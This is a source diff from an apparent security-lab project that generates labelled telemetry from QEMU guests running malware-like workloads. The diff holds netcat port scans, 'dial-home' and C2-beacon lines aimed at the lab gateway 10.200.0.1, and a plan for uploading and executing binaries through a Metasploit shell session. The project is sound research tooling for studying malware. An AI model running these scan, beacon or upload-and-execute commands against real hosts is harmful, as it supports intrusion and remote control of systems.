|
||||
profile="cpu-saturate",
|
||||
start_cmd=w.start_cmd,
|
||||
stop_cmd=w.stop_cmd,
|
||||
description="100% CPU on 1 vCPU; no IO, no net",
|
||||
)
|
||||
|
||||
|
||||
def _scan_and_dial() -> Workload:
|
||||
"""Mirai-class — TCP SYN-style probe of bridge subnet + occasional
|
||||
"dial home" to the gateway. Heavy net, moderate CPU.
|
||||
|
||||
Uses ``nc`` (netcat) instead of bash's /dev/tcp redirects — the
|
||||
latter is bash-only and silently no-ops on busybox / dash, which
|
||||
is what Metasploitable2 and Alpine guest sessions actually run.
|
||||
Falls back to a TCP-via-python one-liner if nc isn't available."""
|
||||
body = (
|
||||
" for i in 1 2 3 4 5 6 7 8 9 10; do\n"
|
||||
" nc -z -w 1 10.200.0.$((i+1)) 23 >/dev/null 2>&1 &\n"
|
||||
" nc -z -w 1 10.200.0.$((i+1)) 2323 >/dev/null 2>&1 &\n"
|
||||
" done\n"
|
||||
" wait\n"
|
||||
" echo dial-home | nc -w 1 10.200.0.1 4444 >/dev/null 2>&1\n"
|
||||
" sleep 2\n"
|
||||
)
|
||||
w = _wrap_loop("scan-and-dial", body)
|
||||
return Workload(
|
||||
profile="scan-and-dial",
|
||||
start_cmd=w.start_cmd,
|
||||
stop_cmd=w.stop_cmd,
|
||||
description="Periodic SYN-style scan across bridge IPs + dial-home",
|
||||
)
|
||||
|
||||
|
||||
def _io_walk() -> Workload:
|
||||
"""Cryptolocker-class — fs traversal + write spikes. Heavy disk."""
|
||||
body = (
|
||||
" mkdir -p /tmp/.cis490-victim\n"
|
||||
" for n in 1 2 3 4 5 6 7 8; do\n"
|
||||
" dd if=/dev/urandom of=/tmp/.cis490-victim/f$n bs=4k count=64 2>/dev/null\n"
|
||||
" done\n"
|
||||
" for f in /tmp/.cis490-victim/*; do cat $f > /dev/null; done\n"
|
||||
" sleep 1\n"
|
||||
)
|
||||
w = _wrap_loop("io-walk", body)
|
||||
return Workload(
|
||||
profile="io-walk",
|
||||
start_cmd=w.start_cmd,
|
||||
stop_cmd=w.stop_cmd,
|
||||
description="FS traversal + random-data writes, periodic re-read",
|
||||
)
|
||||
|
||||
|
||||
def _bursty_c2() -> Workload:
|
||||
"""Dridex-class — long idle, periodic small TCP burst to a fixed
|
||||
peer (the bridge gateway). nc-based for busybox compatibility."""
|
||||
body = (
|
||||
" sleep 25\n"
|
||||
" for i in 1 2 3; do\n"
|
||||
" echo c2-beacon-$$-$i | nc -w 1 10.200.0.1 4445 >/dev/null 2>&1\n"
|
||||
" sleep 1\n"
|
||||
" done\n"
|
||||
)
|
||||
w = _wrap_loop("bursty-c2", body)
|
||||
return Workload(
|
||||
profile="bursty-c2",
|
||||
start_cmd=w.start_cmd,
|
||||
stop_cmd=w.stop_cmd,
|
||||
description="Long idle + periodic 3-packet egress burst to gateway",
|
||||
)
|
||||
|
||||
|
||||
def _low_and_slow() -> Workload:
|
||||
"""Kovter-class — low CPU, periodic memory churn, no on-disk
|
||||
artifact. The hardest envelope to label from /proc alone."""
|
||||
body = (
|
||||
" sleep 8\n"
|
||||
" awk 'BEGIN { for(i=0;i<200000;i++) a[i]=i*i; }' >/dev/null 2>&1\n"
|
||||
" sleep 4\n"
|
||||
)
|
||||
w = _wrap_loop("low-and-slow", body)
|
||||
return Workload(
|
||||
profile="low-and-slow",
|
||||
start_cmd=w.start_cmd,
|
||||
stop_cmd=w.stop_cmd,
|
||||
description="Periodic memory churn (~200k array allocs) on a slow cycle",
|
||||
)
|
||||
|
||||
|
||||
def _shell_resident() -> Workload:
|
||||
"""RAT-style — keep a single TCP connection open to the gateway
|
||||
with occasional command bursts. Long-lived flow, small bytes.
|
||||
|
||||
Uses ``nc -w`` on the busybox-compatible path. We pipe a slow
|
||||
feed into nc so the connection stays open for ~30 s before the
|
||||
-w idle timeout closes it, matching the long-lived-flow shape.
|
||||
Then we sleep + reconnect, producing the periodic-tick pattern."""
|
||||
body = (
|
||||
" ( for i in 1 2 3 4 5 6; do\n"
|
||||
" echo cmd-tick-$i\n"
|
||||
" sleep 5\n"
|
||||
" done ) | nc -w 30 10.200.0.1 4446 >/dev/null 2>&1\n"
|
||||
" sleep 5\n"
|
||||
)
|
||||
w = _wrap_loop("shell-resident", body)
|
||||
return Workload(
|
||||
profile="shell-resident",
|
||||
start_cmd=w.start_cmd,
|
||||
stop_cmd=w.stop_cmd,
|
||||
description="Resident TCP connection to gateway with periodic ticks",
|
||||
)
|
||||
|
||||
|
||||
_FACTORIES = {
|
||||
"cpu-saturate": _cpu_saturate,
|
||||
"scan-and-dial": _scan_and_dial,
|
||||
"io-walk": _io_walk,
|
||||
"bursty-c2": _bursty_c2,
|
||||
"low-and-slow": _low_and_slow,
|
||||
"shell-resident": _shell_resident,
|
||||
}
|
||||
|
||||
|
||||
def workload_for(sample: Sample | None) -> Workload | None:
|
||||
"""Return the Workload matching ``sample.profile``, or None when
|
||||
no sample is supplied (driver v1 fallback path)."""
|
||||
if sample is None:
|
||||
return None
|
||||
factory = _FACTORIES.get(sample.profile)
|
||||
if factory is None:
|
||||
log.warning("no workload profile for %r; falling back to cpu-saturate", sample.profile)
|
||||
return _cpu_saturate()
|
||||
return factory()
|
||||
|
||||
|
||||
def all_profiles() -> list[str]:
|
||||
return sorted(_FACTORIES.keys())
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Tier-4 path: real-binary upload + execute inside the shell session
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class ChunkedUpload:
|
||||
"""Multi-step upload plan. Each chunk is one ``shell_write`` call;
|
||||
the driver issues them in order, then a final integrity check, then
|
||||
the exec command. The last command runs the binary and writes its
|
||||
PID to ``pid_path``."""
|
||||
profile: str
|
||||
chunks: tuple[str, ...] # each is a complete shell command
|
||||
finalize_cmd: str # decode + verify sha256 + chmod
|
||||
exec_cmd: str # actually launch the binary
|
||||
stop_cmd: str
|
||||
bin_path: str
|
||||
pid_path: str
|
||||
expected_sha256: str
|
||||
n_chunks: int
|
||||
|
||||
|
||||
# Conservative chunk size: msfrpc shell_write payloads are reliable
|
||||
# under ~16 KiB (single TCP write inside the framework). Use 8 KiB of
|
||||
# *base64* (which is 6 KiB of binary) per chunk so we leave room for
|
||||
# the wrapper and stay well under the limit.
|
||||
_CHUNK_B64_BYTES = 8 * 1024
|
||||
|
||||
|
||||
def chunked_real_binary_upload(
|
||||
binary_bytes: bytes,
|
||||
sample: Sample | None = None,
|
||||
) -> ChunkedUpload:
|
||||
"""Plan a chunked upload of ``binary_bytes`` into a shell session.
|
||||
|
||||
First chunk creates an empty file; subsequent chunks append a
|
||||
base64 segment. ``finalize_cmd`` decodes + sha256-verifies the
|
||||
result; ``exec_cmd`` launches the binary and stashes its PID.
|
||||
The driver issues these as separate shell_writes so we never
|
||||
push more than ~10 KiB through msfrpc in a single call."""
|
||||
import base64 as _b64
|
||||
import hashlib as _hashlib
|
||||
|
||||
profile = (sample.profile if sample else "real-binary")
|
||||
pid_path = f"/tmp/.cis490-real-{profile}.pid"
|
||||
bin_path = f"/tmp/.cis490-real-{profile}.bin"
|
||||
b64_path = f"/tmp/.cis490-real-{profile}.b64"
|
||||
sha = _hashlib.sha256(binary_bytes).hexdigest()
|
||||
encoded = _b64.b64encode(binary_bytes).decode("ascii")
|
||||
|
||||
chunks: list[str] = []
|
||||
chunks.append(f"mkdir -p /tmp; : > {b64_path}; echo upload-begin")
|
||||
for i in range(0, len(encoded), _CHUNK_B64_BYTES):
|
||||
seg = encoded[i:i + _CHUNK_B64_BYTES]
|
||||
# printf '%s' avoids interpreting '%' / '\\' inside the b64 chars.
|
||||
chunks.append(f"printf '%s' '{seg}' >> {b64_path}")
|
||||
|
||||
finalize = (
|
||||
f"base64 -d {b64_path} > {bin_path} && rm -f {b64_path} && "
|
||||
f"chmod +x {bin_path} && "
|
||||
f"GOT=$(sha256sum {bin_path} | awk '{{print $1}}') && "
|
||||
f"if [ \"$GOT\" = \"{sha}\" ]; then echo sha-ok; "
|
||||
f"else echo sha-mismatch:$GOT; rm -f {bin_path}; false; fi"
|
||||
)
|
||||
exec_cmd = (
|
||||
f"nohup {bin_path} </dev/null >/dev/null 2>&1 & "
|
||||
f"echo $! > {pid_path}; disown; echo exec-ok"
|
||||
)
|
||||
stop = (
|
||||
f"if [ -f {pid_path} ]; then "
|
||||
f" kill -- -$(cat {pid_path}) 2>/dev/null; "
|
||||
f" kill $(cat {pid_path}) 2>/dev/null; "
|
||||
f" rm -f {pid_path} {bin_path}; "
|
||||
f"fi; true"
|
||||
)
|
||||
return ChunkedUpload(
|
||||
profile=f"real:{profile}",
|
||||
chunks=tuple(chunks),
|
||||
finalize_cmd=finalize,
|
||||
exec_cmd=exec_cmd,
|
||||
stop_cmd=stop,
|
||||
bin_path=bin_path,
|
||||
pid_path=pid_path,
|
||||
expected_sha256=sha,
|
||||
n_chunks=len(chunks),
|
||||
)
|
||||
|
||||
|
||||
def real_binary_workload(binary_bytes: bytes, sample: Sample | None = None) -> Workload:
|
||||
"""Backwards-compat wrapper that produces a single-shot Workload
|
||||
by concatenating a chunked plan into one start_cmd. Kept for
|
||||
callers that drive the v1 single-shell-write flow (e.g. tests).
|
||||
|
||||
Production path: the driver should call ``chunked_real_binary_upload``
|
||||
and walk the chunks itself so msfrpc never sees a buffer-busting
|
||||
payload."""
|
||||
plan = chunked_real_binary_upload(binary_bytes, sample=sample)
|
||||
start = "\n".join(list(plan.chunks) + [plan.finalize_cmd, plan.exec_cmd]) + "\n"
|
||||
return Workload(
|
||||
profile=plan.profile,
|
||||
start_cmd=start,
|
||||
stop_cmd=plan.stop_cmd,
|
||||
description=f"Real binary upload+execute ({len(binary_bytes)} bytes, {plan.n_chunks} chunks)",
|
||||
)
|
||||
|
|
@ -36,7 +36,8 @@ from datetime import datetime, timezone
|
|||
from pathlib import Path
|
||||
from typing import Callable
|
||||
|
||||
from collectors import proc_qemu
|
||||
from collectors import guest_agent, pcap, perf_qemu, proc_qemu, qmp
|
||||
from samples.manifest import Sample
|
||||
|
||||
from .ulid import new_ulid
|
||||
|
||||
|
|
@ -61,6 +62,38 @@ class EpisodeConfig:
|
|||
# When set, walk this schedule and ignore duration_s for sleep timing.
|
||||
# ``duration_s`` still goes in meta.schedule for record-keeping.
|
||||
phase_schedule: PhaseSchedule | None = None
|
||||
# Optional: paths to QEMU sockets exposed by the launcher. When
|
||||
# set, EpisodeRunner spins up additional collector threads.
|
||||
qmp_socket: Path | None = None
|
||||
qmp_interval_ms: int = 1000 # QMP queries are heavier than /proc reads
|
||||
guest_agent_socket: Path | None = None
|
||||
# Optional: bridge interface to capture per-episode pcap on. When
|
||||
# set, EpisodeRunner spawns tcpdump for the duration of the
|
||||
# schedule and bucketizes the result into netflow.jsonl on stop.
|
||||
bridge_iface: str | None = None
|
||||
bridge_ip: str = "10.200.0.1"
|
||||
pcap_snaplen: int = 256
|
||||
# Source 3: perf stat sampling. Disabled by default because perf
|
||||
# needs CAP_SYS_ADMIN or perf_event_paranoid <= 1; enable
|
||||
# explicitly per-episode when the host supports it.
|
||||
enable_perf: bool = False
|
||||
perf_interval_ms: int = 100
|
||||
# The Sample that drove this episode's workload selection. Stamped
|
||||
# into meta.json so trainers can join episodes by family / kind
|
||||
# without re-deriving from events. None = v1 yes-loop fallback.
|
||||
sample: Sample | None = None
|
||||
# The exploit module that fired (Tier 3+). Plain dict so the runner
|
||||
# doesn't need to import exploits.modules; populated by callers
|
||||
# that have a ModuleConfig in hand.
|
||||
exploit_meta: dict | None = None
|
||||
# Snapshot/revert (Tier 0+):
|
||||
# revert_at_start — before any phase walks, loadvm <snapshot_name>.
|
||||
# Use this to drop the guest back to a known-good baseline at
|
||||
# the start of every episode in a long-lived-VM fleet loop.
|
||||
# revert_at_end — after the schedule walks, loadvm <snapshot_name>
|
||||
# so the next consumer of this VM starts clean too.
|
||||
revert_at_start: bool = False
|
||||
revert_at_end: bool = False
|
||||
|
||||
|
||||
@dataclass
|
||||
|
|
@ -68,8 +101,13 @@ class EpisodeResult:
|
|||
episode_id: str
|
||||
episode_dir: Path
|
||||
rows_proc: int
|
||||
pid_disappeared: bool
|
||||
duration_observed_s: float
|
||||
rows_qmp: int = 0
|
||||
rows_guest: int = 0
|
||||
rows_netflow: int = 0
|
||||
rows_perf: int = 0
|
||||
pcap_bytes: int = 0
|
||||
pid_disappeared: bool = False
|
||||
duration_observed_s: float = 0.0
|
||||
phases_observed: list[str] = field(default_factory=list)
|
||||
|
||||
|
||||
|
|
@ -83,25 +121,73 @@ class EpisodeRunner:
|
|||
self.on_phase = on_phase
|
||||
self.episode_id = cfg.episode_id or new_ulid()
|
||||
self.episode_dir: Path = cfg.data_root / "episodes" / self.episode_id
|
||||
# Create the dir up front so external drivers can call
|
||||
# emit_event() between construction and run() — e.g. an exploit
|
||||
# driver that writes a driver_setup event before the schedule
|
||||
# walks. The dir is otherwise empty until run() opens files.
|
||||
self.episode_dir.mkdir(parents=True, exist_ok=True)
|
||||
self._t_mono_origin_ns: int = 0
|
||||
self._stop = threading.Event()
|
||||
|
||||
# ---- public ---------------------------------------------------------
|
||||
|
||||
def run(self) -> EpisodeResult:
|
||||
self.episode_dir.mkdir(parents=True, exist_ok=True)
|
||||
self._t_mono_origin_ns = time.monotonic_ns()
|
||||
started_at_wall = datetime.now(timezone.utc).isoformat()
|
||||
# snapshot_load is the marker for "episode clock = 0". Emit
|
||||
# BEFORE any file I/O — _write_meta() takes >1 ms on slow disks
|
||||
# (Refs spectral/CIS490#7).
|
||||
self.emit_event("snapshot_load", snapshot=self.cfg.snapshot_name)
|
||||
|
||||
started_at_wall = datetime.now(timezone.utc).isoformat()
|
||||
meta = self._initial_meta(started_at_wall)
|
||||
self._write_meta(meta)
|
||||
|
||||
self._emit_event(0, "snapshot_load", snapshot=self.cfg.snapshot_name)
|
||||
# Snapshot revert at start: pause+restore the guest to a known
|
||||
# baseline before phase 0. Requires QMP and a savevm having
|
||||
# already taken place (the launcher is responsible for that).
|
||||
if self.cfg.revert_at_start and self.cfg.qmp_socket is not None:
|
||||
try:
|
||||
client = qmp.QMPClient(self.cfg.qmp_socket)
|
||||
client.connect()
|
||||
try:
|
||||
out = client.loadvm(self.cfg.snapshot_name)
|
||||
self.emit_event(
|
||||
"snapshot_revert",
|
||||
when="start",
|
||||
snapshot=self.cfg.snapshot_name,
|
||||
output=(out or "").strip()[:256],
|
||||
)
|
||||
finally:
|
||||
client.close()
|
||||
except Exception as e:
|
||||
log.warning("loadvm at start failed: %s", e)
|
||||
self.emit_event(
|
||||
"snapshot_revert_failed",
|
||||
when="start",
|
||||
snapshot=self.cfg.snapshot_name,
|
||||
error=str(e),
|
||||
)
|
||||
|
||||
rows_holder: dict[str, int] = {"rows": 0}
|
||||
rows_holder: dict[str, int] = {"proc": 0, "qmp": 0, "guest": 0, "netflow": 0, "perf": 0}
|
||||
pcap_handle: pcap.CaptureHandle | None = None
|
||||
pcap_path = self.episode_dir / "network.pcap"
|
||||
netflow_path = self.episode_dir / "netflow.jsonl"
|
||||
if self.cfg.bridge_iface:
|
||||
try:
|
||||
pcap_handle = pcap.run_capture(
|
||||
bridge=self.cfg.bridge_iface,
|
||||
pcap_path=pcap_path,
|
||||
snaplen=self.cfg.pcap_snaplen,
|
||||
)
|
||||
self.emit_event("pcap_started", iface=self.cfg.bridge_iface)
|
||||
except (OSError, FileNotFoundError) as e:
|
||||
log.warning("pcap capture not available on %s: %s",
|
||||
self.cfg.bridge_iface, e)
|
||||
self.emit_event("pcap_unavailable",
|
||||
iface=self.cfg.bridge_iface, error=str(e))
|
||||
|
||||
def _collector() -> None:
|
||||
rows_holder["rows"] = proc_qemu.run_loop(
|
||||
def _proc_collector() -> None:
|
||||
rows_holder["proc"] = proc_qemu.run_loop(
|
||||
pid=self.cfg.target_pid,
|
||||
output_path=self.episode_dir / "telemetry-proc.jsonl",
|
||||
t_mono_origin_ns=self._t_mono_origin_ns,
|
||||
|
|
@ -109,8 +195,44 @@ class EpisodeRunner:
|
|||
stop_event=self._stop,
|
||||
)
|
||||
|
||||
t = threading.Thread(target=_collector, daemon=True, name="proc_qemu")
|
||||
t.start()
|
||||
def _qmp_collector() -> None:
|
||||
assert self.cfg.qmp_socket is not None
|
||||
rows_holder["qmp"] = qmp.run_loop(
|
||||
socket_path=self.cfg.qmp_socket,
|
||||
output_path=self.episode_dir / "telemetry-qmp.jsonl",
|
||||
t_mono_origin_ns=self._t_mono_origin_ns,
|
||||
interval_ms=self.cfg.qmp_interval_ms,
|
||||
stop_event=self._stop,
|
||||
)
|
||||
|
||||
def _guest_collector() -> None:
|
||||
assert self.cfg.guest_agent_socket is not None
|
||||
rows_holder["guest"] = guest_agent.run_loop(
|
||||
socket_path=self.cfg.guest_agent_socket,
|
||||
output_path=self.episode_dir / "telemetry-guest.jsonl",
|
||||
t_mono_origin_ns=self._t_mono_origin_ns,
|
||||
stop_event=self._stop,
|
||||
)
|
||||
|
||||
def _perf_collector() -> None:
|
||||
rows_holder["perf"] = perf_qemu.run_loop(
|
||||
pid=self.cfg.target_pid,
|
||||
output_path=self.episode_dir / "telemetry-perf.jsonl",
|
||||
t_mono_origin_ns=self._t_mono_origin_ns,
|
||||
interval_ms=self.cfg.perf_interval_ms,
|
||||
stop_event=self._stop,
|
||||
)
|
||||
|
||||
threads: list[threading.Thread] = []
|
||||
threads.append(threading.Thread(target=_proc_collector, daemon=True, name="proc_qemu"))
|
||||
if self.cfg.qmp_socket is not None:
|
||||
threads.append(threading.Thread(target=_qmp_collector, daemon=True, name="qmp"))
|
||||
if self.cfg.guest_agent_socket is not None:
|
||||
threads.append(threading.Thread(target=_guest_collector, daemon=True, name="guest_agent"))
|
||||
if self.cfg.enable_perf:
|
||||
threads.append(threading.Thread(target=_perf_collector, daemon=True, name="perf"))
|
||||
for t in threads:
|
||||
t.start()
|
||||
|
||||
phases_observed: list[str] = []
|
||||
try:
|
||||
|
|
@ -121,21 +243,60 @@ class EpisodeRunner:
|
|||
phases_observed = ["clean"]
|
||||
self._stop.wait(timeout=self.cfg.duration_s)
|
||||
finally:
|
||||
self._stop.set()
|
||||
t.join(timeout=2.0)
|
||||
# Optional revert before stopping collectors so the
|
||||
# transition shows up in their telemetry too — useful for
|
||||
# building "snapshot revert" as a labeled phase later.
|
||||
if self.cfg.revert_at_end and self.cfg.qmp_socket is not None:
|
||||
try:
|
||||
client = qmp.QMPClient(self.cfg.qmp_socket)
|
||||
client.connect()
|
||||
try:
|
||||
out = client.loadvm(self.cfg.snapshot_name)
|
||||
self.emit_event(
|
||||
"snapshot_revert",
|
||||
when="end",
|
||||
snapshot=self.cfg.snapshot_name,
|
||||
output=(out or "").strip()[:256],
|
||||
)
|
||||
finally:
|
||||
client.close()
|
||||
except Exception as e:
|
||||
log.warning("loadvm at end failed: %s", e)
|
||||
self.emit_event(
|
||||
"snapshot_revert_failed",
|
||||
when="end",
|
||||
snapshot=self.cfg.snapshot_name,
|
||||
error=str(e),
|
||||
)
|
||||
|
||||
self._stop.set()
|
||||
for t in threads:
|
||||
t.join(timeout=3.0)
|
||||
if pcap_handle is not None:
|
||||
rc = pcap.stop_capture(pcap_handle)
|
||||
self.emit_event("pcap_stopped", rc=rc,
|
||||
pcap_bytes=pcap_path.stat().st_size if pcap_path.exists() else 0)
|
||||
rows_holder["netflow"] = pcap.bucketize(
|
||||
pcap_path, netflow_path,
|
||||
bucket_ms=100,
|
||||
t_mono_origin_ns=self._t_mono_origin_ns,
|
||||
bridge_ip=self.cfg.bridge_ip,
|
||||
)
|
||||
|
||||
end_mono_ns = time.monotonic_ns() - self._t_mono_origin_ns
|
||||
pid_alive = _pid_alive(self.cfg.target_pid)
|
||||
self._emit_event(
|
||||
end_mono_ns,
|
||||
"episode_end",
|
||||
target_pid_alive=pid_alive,
|
||||
)
|
||||
self.emit_event("episode_end", target_pid_alive=pid_alive)
|
||||
end_mono_ns = time.monotonic_ns() - self._t_mono_origin_ns
|
||||
|
||||
meta["ended_at_wall"] = datetime.now(timezone.utc).isoformat()
|
||||
pcap_size = pcap_path.stat().st_size if pcap_path.exists() else 0
|
||||
meta["result"] = {
|
||||
"phases_observed": phases_observed,
|
||||
"rows_proc": rows_holder["rows"],
|
||||
"rows_proc": rows_holder["proc"],
|
||||
"rows_qmp": rows_holder["qmp"],
|
||||
"rows_guest": rows_holder["guest"],
|
||||
"rows_perf": rows_holder["perf"],
|
||||
"rows_netflow": rows_holder["netflow"],
|
||||
"pcap_bytes": pcap_size,
|
||||
"pid_alive_at_end": pid_alive,
|
||||
"duration_observed_s": end_mono_ns / 1_000_000_000,
|
||||
}
|
||||
|
|
@ -143,16 +304,22 @@ class EpisodeRunner:
|
|||
(self.episode_dir / "done.marker").touch()
|
||||
|
||||
log.info(
|
||||
"episode %s complete: rows=%d duration=%.2fs phases=%s",
|
||||
"episode %s complete: proc=%d qmp=%d guest=%d perf=%d netflow=%d pcap=%dB duration=%.2fs phases=%s",
|
||||
self.episode_id,
|
||||
rows_holder["rows"],
|
||||
rows_holder["proc"], rows_holder["qmp"], rows_holder["guest"],
|
||||
rows_holder["perf"], rows_holder["netflow"], pcap_size,
|
||||
end_mono_ns / 1e9,
|
||||
phases_observed,
|
||||
)
|
||||
return EpisodeResult(
|
||||
episode_id=self.episode_id,
|
||||
episode_dir=self.episode_dir,
|
||||
rows_proc=rows_holder["rows"],
|
||||
rows_proc=rows_holder["proc"],
|
||||
rows_qmp=rows_holder["qmp"],
|
||||
rows_guest=rows_holder["guest"],
|
||||
rows_netflow=rows_holder["netflow"],
|
||||
rows_perf=rows_holder["perf"],
|
||||
pcap_bytes=pcap_size,
|
||||
pid_disappeared=not pid_alive,
|
||||
duration_observed_s=end_mono_ns / 1_000_000_000,
|
||||
phases_observed=phases_observed,
|
||||
|
|
@ -171,9 +338,7 @@ class EpisodeRunner:
|
|||
break
|
||||
t_mono = time.monotonic_ns() - self._t_mono_origin_ns
|
||||
self._emit_label(t_mono, phase, prev=prev, reason="scheduled")
|
||||
self._emit_event(
|
||||
t_mono, "phase_transition", to=phase, prev=prev
|
||||
)
|
||||
self.emit_event("phase_transition", to=phase, prev=prev)
|
||||
if self.on_phase is not None:
|
||||
try:
|
||||
self.on_phase(phase)
|
||||
|
|
@ -185,6 +350,17 @@ class EpisodeRunner:
|
|||
return observed
|
||||
|
||||
def _initial_meta(self, started_at_wall: str) -> dict:
|
||||
sample_meta: dict | None = None
|
||||
if self.cfg.sample is not None:
|
||||
s = self.cfg.sample
|
||||
sample_meta = {
|
||||
"name": s.name,
|
||||
"family": s.family,
|
||||
"category": s.category,
|
||||
"profile": s.profile,
|
||||
"kind": s.kind,
|
||||
"sha256": s.sha256,
|
||||
}
|
||||
return {
|
||||
"episode_id": self.episode_id,
|
||||
"schema_version": SCHEMA_VERSION,
|
||||
|
|
@ -202,8 +378,8 @@ class EpisodeRunner:
|
|||
"ram_mib": None,
|
||||
"target_pid": self.cfg.target_pid,
|
||||
},
|
||||
"exploit": None,
|
||||
"sample": None,
|
||||
"exploit": self.cfg.exploit_meta,
|
||||
"sample": sample_meta,
|
||||
"schedule": {
|
||||
"baseline_seconds": self.cfg.duration_s,
|
||||
"interval_ms": self.cfg.interval_ms,
|
||||
|
|
@ -220,7 +396,15 @@ class EpisodeRunner:
|
|||
f.write("\n")
|
||||
os.replace(tmp, path)
|
||||
|
||||
def _emit_event(self, t_mono_ns: int, event: str, **extra) -> None:
|
||||
def emit_event(self, event: str, **extra) -> None:
|
||||
"""Append a row to events.jsonl. Public so external drivers
|
||||
(e.g. the MSF exploit driver) can stamp their own events with
|
||||
the same monotonic clock the orchestrator is using."""
|
||||
t_mono_ns = (
|
||||
time.monotonic_ns() - self._t_mono_origin_ns
|
||||
if self._t_mono_origin_ns
|
||||
else 0
|
||||
)
|
||||
row = {
|
||||
"t_mono_ns": t_mono_ns,
|
||||
"t_wall_ns": time.time_ns(),
|
||||
|
|
|
|||
467
orchestrator/fleet.py
Normal file
467
orchestrator/fleet.py
Normal file
|
|
@ -0,0 +1,467 @@
|
|||
"""Fleet runner — concurrent VM episodes with resource awareness.
|
||||
|
||||
The lab host detects its own capacity, picks how many VMs to run in
|
||||
parallel without driving the box into swap or starving the host
|
||||
itself, and runs that many episodes simultaneously. Each slot gets a
|
||||
distinct ``Sample`` from the manifest (deterministically chosen by
|
||||
host_id + slot index), so every concurrent VM produces novel,
|
||||
labelable data.
|
||||
|
||||
Capacity heuristic — defaults documented inline so they're auditable:
|
||||
|
||||
cores_total = os.cpu_count()
|
||||
cores_reserved = max(1, cores_total // 8) # host + collectors
|
||||
ram_per_vm_mib = 320 # Alpine fits in 256
|
||||
# but leave 64 for
|
||||
# overhead (qemu+ovmf)
|
||||
ram_headroom_mib = max(1024, ram_total // 8) # never starve host
|
||||
max_by_cores = cores_total - cores_reserved
|
||||
max_by_ram = (ram_available - ram_headroom) // ram_per_vm
|
||||
max_by_load = if (load_1m / cores) > 0.75: tighter cap
|
||||
|
||||
The smallest of these wins. The reasoning string is logged + saved
|
||||
into each episode's meta.json under ``fleet`` so post-hoc analysis
|
||||
can correlate "this episode was run when 6 VMs were concurrent" with
|
||||
its observed envelope.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
import os
|
||||
import shutil
|
||||
import signal
|
||||
import subprocess
|
||||
import threading
|
||||
import time
|
||||
from concurrent.futures import ThreadPoolExecutor, as_completed
|
||||
from dataclasses import dataclass, field
|
||||
from pathlib import Path
|
||||
|
||||
from exploits.modules import (
|
||||
ModuleConfig, load_module_configs, module_target_port, select_module,
|
||||
)
|
||||
from samples.manifest import Sample, SampleManifest
|
||||
|
||||
|
||||
log = logging.getLogger("cis490.fleet")
|
||||
|
||||
|
||||
def _msfrpcd_available(host: str = "127.0.0.1", port: int = 55553) -> bool:
|
||||
"""True when msfrpcd is listening — gate for the Tier-3 default.
|
||||
A Tier-2 fallback runs when msfrpcd isn't there (still useful
|
||||
data, just labeled with no-exploit so the trainer can filter)."""
|
||||
import socket as _sk
|
||||
try:
|
||||
with _sk.create_connection((host, port), timeout=0.3):
|
||||
return True
|
||||
except OSError:
|
||||
return False
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class FleetCapacity:
|
||||
cores_total: int
|
||||
cores_reserved: int
|
||||
ram_total_mib: int
|
||||
ram_available_mib: int
|
||||
ram_per_vm_mib: int
|
||||
ram_headroom_mib: int
|
||||
load_1m: float
|
||||
max_by_cores: int
|
||||
max_by_ram: int
|
||||
max_by_load: int
|
||||
max_concurrent: int
|
||||
rationale: str
|
||||
|
||||
def to_dict(self) -> dict:
|
||||
return {
|
||||
"cores_total": self.cores_total,
|
||||
"cores_reserved": self.cores_reserved,
|
||||
"ram_total_mib": self.ram_total_mib,
|
||||
"ram_available_mib": self.ram_available_mib,
|
||||
"ram_per_vm_mib": self.ram_per_vm_mib,
|
||||
"ram_headroom_mib": self.ram_headroom_mib,
|
||||
"load_1m": self.load_1m,
|
||||
"max_by_cores": self.max_by_cores,
|
||||
"max_by_ram": self.max_by_ram,
|
||||
"max_by_load": self.max_by_load,
|
||||
"max_concurrent": self.max_concurrent,
|
||||
"rationale": self.rationale,
|
||||
}
|
||||
|
||||
|
||||
@dataclass
|
||||
class FleetConfig:
|
||||
host_id: str
|
||||
repo_root: Path
|
||||
data_root: Path
|
||||
manifest: SampleManifest
|
||||
# Module catalog for Tier-3 dispatch. Required for fleet-driven
|
||||
# exploit-fire variety; empty catalog forces Tier-2 fallback.
|
||||
modules: dict[str, ModuleConfig] = field(default_factory=dict)
|
||||
# VM resource shape — must match what the launcher requests.
|
||||
ram_per_vm_mib: int = 320
|
||||
# Cap concurrency below the calculated max (e.g. for a smoke test).
|
||||
max_concurrent_override: int | None = None
|
||||
# Skip episodes whose sample requires a real binary that's not present.
|
||||
require_real_samples: bool = False
|
||||
# Force Tier-2 even when msfrpcd is up; used by tests + dev runs
|
||||
# that want a no-exploit baseline.
|
||||
force_tier2: bool = False
|
||||
# msfrpcd connectivity (read by tier-3 driver via env).
|
||||
msfrpcd_host: str = "127.0.0.1"
|
||||
msfrpcd_port: int = 55553
|
||||
|
||||
|
||||
def _read_meminfo() -> dict[str, int]:
|
||||
out: dict[str, int] = {}
|
||||
try:
|
||||
with open("/proc/meminfo") as f:
|
||||
for line in f:
|
||||
k, _, rest = line.partition(":")
|
||||
v = rest.strip()
|
||||
if v.endswith(" kB"):
|
||||
try:
|
||||
out[k] = int(v[:-3]) * 1024
|
||||
except ValueError:
|
||||
pass
|
||||
except OSError:
|
||||
pass
|
||||
return out
|
||||
|
||||
|
||||
def _read_loadavg() -> float:
|
||||
try:
|
||||
with open("/proc/loadavg") as f:
|
||||
return float(f.read().split()[0])
|
||||
except (OSError, ValueError, IndexError):
|
||||
return 0.0
|
||||
|
||||
|
||||
def detect_capacity(*, ram_per_vm_mib: int = 320) -> FleetCapacity:
|
||||
cores_total = os.cpu_count() or 1
|
||||
# Reserve at least 1 core, more if the host has many.
|
||||
cores_reserved = max(1, cores_total // 8)
|
||||
|
||||
mem = _read_meminfo()
|
||||
ram_total_b = mem.get("MemTotal", 0)
|
||||
ram_avail_b = mem.get("MemAvailable", ram_total_b)
|
||||
ram_total_mib = ram_total_b // (1024 * 1024)
|
||||
ram_available_mib = ram_avail_b // (1024 * 1024)
|
||||
# Never starve the host of more than ~7/8 of its memory.
|
||||
ram_headroom_mib = max(1024, ram_total_mib // 8)
|
||||
|
||||
load_1m = _read_loadavg()
|
||||
|
||||
max_by_cores = max(0, cores_total - cores_reserved)
|
||||
if ram_per_vm_mib <= 0:
|
||||
max_by_ram = max_by_cores
